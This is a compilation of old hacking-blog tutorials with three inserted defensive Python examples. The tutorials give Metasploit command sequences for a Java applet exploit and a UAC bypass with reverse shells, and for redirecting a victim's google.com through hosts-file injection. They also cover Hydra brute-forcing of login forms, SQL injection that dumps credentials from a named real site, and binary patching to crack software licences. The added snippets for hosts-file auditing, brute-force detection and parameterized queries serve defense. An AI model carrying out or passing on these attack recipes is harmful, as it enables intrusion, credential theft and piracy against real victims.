
    HACK REMOTE P.C. USING LATEST JAVA VULNERABILITY


    JAVA APPLET JMX REMOTE CODE EXECUTION:-

    This vulnerability was exploited in February 2013. Additionally, this module bypasses the default security settings introduced in Java 7 Update 10 to run an unsigned applet without displaying any warning to the user.


    Any OS that is running Java 7 Update 10 is exploitable. The attacker only requires Metasploit.

    Open your terminal & type following code

    msfconsole
    use exploit/windows/browser/java_jre17_jmxbean_2
    msf exploit (java_jre17_jmxbean_2)>set payload java/shell_reverse_tcp
    msf exploit (java_jre17_jmxbean_2)>set lhost 192.168.1.7 (IP of Local Host)
    msf exploit (java_jre17_jmxbean_2)>set srvhost 192.168.1.7 (This must be an address on the local machine)
    msf exploit (java_jre17_jmxbean_2)>set uripath / (The Url to use for this exploit)
    msf exploit (java_jre17_jmxbean_2)>exploit

    Now the URL you should give to your victim is http://192.168.1.7:8080/
    Send the link to the victim. As soon as he clicks it, you get a session. Type the following commands.

    Sessions -l
    sessions -i 1

    Now you get the victim's shell.

    D.N.S. POISONING USING METASPLOIT.


    Today we will edit the hosts file of a remote PC which has been compromised. By editing the hosts file you can redirect any website to any IP address. We will use Metasploit for this.
    (1)Hack remote p.c .(How to hack Remote P.C.?)
    (2)Now we will Bypass U.A.C. protection of windows.
    (3)Open Terminal & type following code in terminal
    msfconsole
    use exploit/windows/local/bypassuac
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.1.6
    set session 1
    exploit
    (4)Now we will edit host file.
    msf >use post/windows/manage/injet_host
    msf post(injet_host) >set domain www.google.com
    msf post(injet_host) >set ip Your Desired I.P.
    msf post(injet_host) >set session 2
    msf post(injet_host) >exploit

    This will Redirect google.com in victim p.c to your desired I.P.
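
Seen from the defending side, the change described above is a new line in `C:\Windows\System32\drivers\etc\hosts`, so auditing that file catches it. The following is an added example, not part of the original post: the sample file contents, the allowlist and the function names are constructed for illustration.

```python
import ipaddress

# Names a stock hosts file maps on its own.
DEFAULT_NAMES = {"localhost", "localhost.localdomain", "ip6-localhost", "ip6-loopback"}

# Constructed sample: a hosts file after an entry for www.google.com was injected.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
0.0.0.0         ads.example.net        # local ad blocking
203.0.113.50    www.google.com
10.0.0.12       intranet.corp.example
"""

def parse_hosts(text):
    """Yield (line_no, ip, hostname) for every active mapping in hosts-file text."""
    for line_no, raw in enumerate(text.splitlines(), start=1):
        fields = raw.split("#", 1)[0].split()      # strip comments, split on whitespace
        if len(fields) < 2:
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                                # not an address: skip malformed line
        for name in fields[1:]:
            yield line_no, ip, name.lower().rstrip(".")

def audit_hosts(text, allowed=frozenset()):
    """Return [(line_no, hostname, ip, kind)] for mappings outside the allowlist.

    kind is "sinkhole" for loopback/0.0.0.0 targets (typical blocklists) and
    "redirect" for anything that sends the name to another machine.
    """
    findings = []
    for line_no, ip, name in parse_hosts(text):
        if name in DEFAULT_NAMES or name in allowed:
            continue
        kind = "sinkhole" if (ip.is_loopback or ip.is_unspecified) else "redirect"
        findings.append((line_no, name, str(ip), kind))
    return findings

if __name__ == "__main__":
    for finding in audit_hosts(SAMPLE_HOSTS, allowed={"intranet.corp.example"}):
        print(finding)
```

A "redirect" finding for a public domain is the case to investigate; pairing the audit with file-integrity monitoring on the hosts file shows when the line was written.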

    What is BRUTE-FORCE attack ?


    A password attack that does not attempt to decrypt any information but keeps trying different passwords. For example, a brute-force attack may use a dictionary of all words or a list of commonly used passwords. To gain access to an account, the program tries every word it has. Another type of brute-force attack is a program that runs through all letters, or letters and numbers, until it gets a match.



    How to install THC-hydra ?

    Open your terminal & type following command
    (1)sudo bash
    (2)wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz
    (3)After downloading ,we are going to extract it
    tar -xvf hydra-6.3-src.tar.gz
    (4)tar -xvf hydra-6.3-src.tar.gz
    (5)./configure && make && install
    (6)make install

    How to use THC-hydra?

    If you are attacking FTP service then first make sure to run an nmap scan for any open FTP ports (by default it should be 21)
    Now in order to brute-force a specific login form you need to define the user-name (if you don't know it include a file containing some), the word-lists directory, the service attacking and form method and the page itself.
    Type following command in terminal
    ./hydra -l admin -P /root/Words.txt site.com http-post-form "/login.php&username=^USER^&password=^PASS^"

    The -l switch defines the username and the capital -L - a list of usernames for the brute-force attack (if you don't know the login).
    The -p switch defines the password and the capital -P - the directory for the wordlists ( the -P is used almost always)
    If we're attacking a web form over http and the method is post then we use "http-post-form" if the service is FTP simply use "ftp".
    Another thing you should be aware of is that the variables username and password are not always named the same. They differ depending on the code.
    They could be usr, pwd etc. They are not necessarily "username" and "password", as in most cases. Just view the source and check what their names are.
    Hydra has a lot more options. I'll explain some of them below, even though they are included in the MAN page of hydra.
    -vV - The verbose mode. This mode shows you every login attempt hydra tries.
    -s - We specify the port on which we're running our attack.
    -x - For brute-force parameters generation. We define our charset and minimum & maximum length of it.
    -R - Restores a previously aborted session of an attack.
    -e ns - Checks for blank or no password fields.
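
A run like the one described above appears in the web server's access log as a burst of POST requests to the login page from one source. The following is an added example, not part of the original post, of detection logic for that pattern. The log lines are constructed, and it assumes the application answers a successful login with a 302 redirect and a failed one with any other status.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

LOG_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

def sample_log():
    """Constructed access log: one noisy source, one ordinary user."""
    start = datetime(2013, 3, 1, 10, 0, 0, tzinfo=timezone.utc)
    def entry(ip, offset, status):
        ts = (start + timedelta(seconds=offset)).strftime("%d/%b/%Y:%H:%M:%S %z")
        return f'{ip} - - [{ts}] "POST /login.php HTTP/1.1" {status} 512'
    noisy = [entry("198.51.100.23", 2 * i, 200) for i in range(8)]
    noisy.append(entry("198.51.100.23", 16, 302))
    user = [entry("192.0.2.10", 0, 200), entry("192.0.2.10", 30, 200),
            entry("192.0.2.10", 45, 302)]
    return noisy + user

def detect_bruteforce(lines, login_path="/login.php", threshold=5,
                      window=timedelta(seconds=60)):
    """Return {ip: {"max_burst": n, "success_after_burst": bool}}."""
    recent = defaultdict(deque)   # ip -> times of failed login POSTs inside the window
    alerts = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or m["path"].split("?")[0] != login_path:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        ip = m["ip"]
        if m["status"] == "302":          # assumption: the app redirects on success
            if ip in alerts:
                alerts[ip]["success_after_burst"] = True
            continue
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:         # drop failures older than the window
            q.popleft()
        if len(q) >= threshold:
            alert = alerts.setdefault(ip, {"max_burst": 0, "success_after_burst": False})
            alert["max_burst"] = max(alert["max_burst"], len(q))
    return alerts

if __name__ == "__main__":
    print(detect_bruteforce(sample_log()))
```

A source flagged with `success_after_burst` should be handled as a likely account compromise, not only as noise; the same counter can drive lockout or rate limiting on the login endpoint.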

    How to hack websites By using SQL Injection



    Today I am going to describe what SQL injection is and how it helps in hacking websites.
    I was asked by various users to write a tutorial about
    HOW TO HACK THE WEBSITES?
    Today I am going to discuss the easiest way to hack websites, i.e. SQL injection techniques.
    We will use the software SQLI Helper to perform this. I have provided a link for the software download... just read on.

    How to hack website using SQLI Helper:
    SQLI Helper is handy software to hack website. You don't need to have any knowledge of SQL to hack website using SQLI Helper. Just follow the guidelines below:


    1. Free DownLoad SQLI Helper to hack websites.

    2. Unzip the file to obtain SQLI Helper to hack website.

    3. Now, when you have website hacking software, you need to find website with potential vulnerability. There are some websites that are unhackable. While finding hackable websites, it is better to search for sites with format "article.php?id=[number]" in url.

    Lets consider one example which I will use in this article:

    http://encycl.anthropology.ru/article.php?id=1

    Check whether your searched victim site can be hacked by entering:

    http://encycl.anthropology.ru/article.php?id='1

    in address bar and hit enter. You will get error message like:

    Query failed.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1 ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=\'1 ORDER BY lastname

    If you get such error message, it is confirmed that you can hack website using this method and now you can move forward to hack website.

    4. Run SQLI Helper on your Computer.

    5. In target field, enter http://encycl.anthropology.ru/article.php?id=1 (the website url you just discovered as hackable) and hit on "Inject".

    6. SQLI Helper will search for columns and you will have something like this: 

    7. Hit on "Get Database" to get:

    8. Select any element from "Database Name" and click on "Get Tables".

    9. Now, select element from table and hit on "Get Columns". I have selected "user" to get userid and password required for login.

    10. Now, when you know "user" table has columns "usr_login" and "usr_pass", select them and hit on "Dump Now".

    11. You will get values like these:

    12. The values obtained are actually hashes, so you have to crack these hashes to get the user login and password to hack the website. For this, go to http://www.md5crack.com/ and crack the hash using the "Crack that hash baby" button. Thus, you are now able to hack the website, as you have the website user id and password. Once you get the admin password, you can easily hack the website.
    Thus friends, I hope you now know how to hack a website using SQL Helper. Note that you cannot hack every website using this method. SQL Helper will help you to hack a website in an easy way. If you have any problem in using SQL Helper to hack a website, please mention it in the comments.


    Enjoy SQL Helper to hack website...


    Hack Websites Using Havij [SQL Injection Tutorial]

    According to a survey, the most common technique for hacking a website is SQL injection. SQL injection is a technique in which a hacker inserts SQL code into a web form to get sensitive information (such as user names and passwords) in order to access the site and deface it. The traditional SQL injection method is quite difficult, but nowadays there are many tools available online through which any script kiddie can use SQL injection to deface a website. Because of these tools, websites have become more vulnerable to these types of attacks.


    One of the popular tools is Havij. Havij is an advanced SQL injection tool which makes SQL injection very easy. Along with SQL injection, it has a built-in admin page finder, which makes it very effective.


    Warning - This article is only for education purposes, By reading this article you agree that Hacky Shacky is not responsible in any way for any kind of damage caused by the information provided in this article.


    Supported Databases With Havij

    • MsSQL 2000/2005 with error.
    • MsSQL 2000/2005 no error union based
    • MySQL union based
    • MySQL Blind
    • MySQL error based
    • MySQL time based
    • Oracle union based
    • MsAccess union based
    • Sybase (ASE)

    Demonstration

    Now I will show you the process of SQL injection step by step.

    Step1: Find an SQL injection vulnerability in your site and insert its string (like http://www.target.com/index.asp?id=123) in Havij.

    Step3: Now click on the Analyse button.

    If your server is vulnerable, information about the target will appear and the columns will be listed.

    Step4: Now click on the Tables button and then click the Get Tables button.

    Step5: Now select the tables with sensitive information and click the Get Columns button. After that, select the Username and Password columns and click on the Get Table button to get the username and password.

    Countermeasures: 

    Here are some of the countermeasures you can take to reduce the risk of SQL Injection

    1. Renaming the admin page will make it difficult for a hacker to locate it.
    2. Use an intrusion detection system and compose signatures for popular SQL injection strings.
    3. One of the best methods to protect your website against SQL injection attacks is to disallow special characters in the admin form. This will make your passwords more vulnerable to brute-force attacks, but you can implement a CAPTCHA to prevent these types of attack.
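
The error message quoted in the SQLI Helper walkthrough shows the `id` value being pasted straight into `SELECT * FROM person_old WHERE id=... ORDER BY lastname` and the database error being echoed to the visitor. The following is an added example, not part of the original post, placing that pattern beside a parameterized query with generic error handling. It uses Python's sqlite3 in place of MySQL, and the rows and function names are constructed.

```python
import re
import sqlite3

def make_db():
    """In-memory stand-in for the site's database (constructed sample rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE person_old (id INTEGER PRIMARY KEY, lastname TEXT)")
    db.executemany("INSERT INTO person_old VALUES (?, ?)",
                   [(1, "Boas"), (2, "Mead"), (3, "Malinowski")])
    return db

def lookup_concatenated(db, article_id):
    """'Before': request text becomes part of the SQL statement itself."""
    sql = "SELECT * FROM person_old WHERE id=" + article_id + " ORDER BY lastname"
    return db.execute(sql).fetchall()

def lookup_parameterized(db, article_id):
    """'After': validate the type, then bind the value so it is never parsed as SQL."""
    if not re.fullmatch(r"[0-9]{1,9}", article_id):
        return []                      # a non-numeric id cannot match any row
    sql = "SELECT * FROM person_old WHERE id=? ORDER BY lastname"
    return db.execute(sql, (int(article_id),)).fetchall()

def handle_request(db, lookup, article_id):
    """Return (status, body). Database errors are never echoed to the client."""
    try:
        rows = lookup(db, article_id)
    except sqlite3.Error:
        # Log the detail server-side; the response carries no query text or table names.
        return 500, "Internal error"
    return (200, rows) if rows else (404, "Not found")

if __name__ == "__main__":
    db = make_db()
    for lookup in (lookup_concatenated, lookup_parameterized):
        print(lookup.__name__, handle_request(db, lookup, "'1"))
```

With the quote-prefixed value from the walkthrough, the concatenated version fails inside the database while the parameterized version treats the input as a value and returns an ordinary not-found response.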

    HOW TO CRACK A SOFTWARE (for beginners)

    How to get started in the art of cracking


    Introduction:
    ————-
    Tons of new programs are coming out each day… But the bad thing is that
    most of them are shareware, which means that you have to pay to get the full
    version (most of the time, when you’ll register, the creators of the program
    will e-mail you an unlock code)… But there are some guys called “crackers”
    who can modify the program so that you don’t need to pay to get the full
    version. In this tutorial, you’ll learn how to crack programs (except VB
    programs). I hope that you’ll enjoy it.

    ———————————————-
    |1) Programs that you’ll need to get started |
    |2) Basic things about cracking |

    1) Programs that you’ll need to get started

    —————————————-

    Here’s the list of programs that you’ll need to get to start cracking:

    WinDisassembler
    Hex Workshop
    Hacker’s View

    2) Basic things about cracking
    —————————

    Please remember that in this tutorial, I expect that you never cracked a
    program, so it should be easy for beginners.

    Here is, step by step, what you have to do to crack a program which needs a
    name and a serial number (assuming that there’s no good protection):

    a) Run the program
    b) Go to the place where you can enter your name and a serial number
    c) Type your name and any serial number
    d) Write down (or memorise) the error message
    e) Copy the program’s exe to .bak (for backup) and to .w32
    f) Disassemble [progname].w32 with WinDisassembler
    g) Click on search -> search. Type the error message, and click on search
    h) Scroll up until you find this “Referenced by a (U)nconditional or
    (C)onditional Jump at Address: | blabla” (where blabla is the address)
    i) Go to this address by scrolling up (the addresses are written on the left)
    j) There should be “jne” written at this address.

    k) Double-click on the line and memorise the offset (written on the status bar)
    l) Launch hacker’s view and edit the exe files
    m) Press F4 and select Decode Mode
    n) Press F5 and type the Offset.
    o) Press F3 and type 74 (which will change jne to je)
    p) If the program isn’t very secured, it should be cracked now!
    q) Run the program
    r) Type your name and any serial number
    s) It should work!

    Note: If it didn’t work, then it means that the program is more protected.
    You have to learn more about assembly language and practice hard to crack advanced software.

    Hacking Windows 7 Using Metasploit

    1. Open terminal, type msfconsole and hit enter. Metasploit will open.

    2. Now type use exploit/multi/browser/java_signed_applet and hit enter.

    3. Type set payload windows/meterpreter/reverse_tcp and hit enter.

    4. Type set lhost 223.185.18.74 (must change 223.185.18.74 with your ip address)

    5. Now type set lport 443 and hit enter.

    6. Now type set srvport 80 and hit enter.

    7. Now type set uripath JackDaniels and hit enter. (You may change JackDaniels to your desired one.)


    8. At last type exploit and hit enter. 
     
    Copyright © 2013. Students Friend - All Rights Reserved
    Website maintained by Ankit Jain And Akhil Dadhich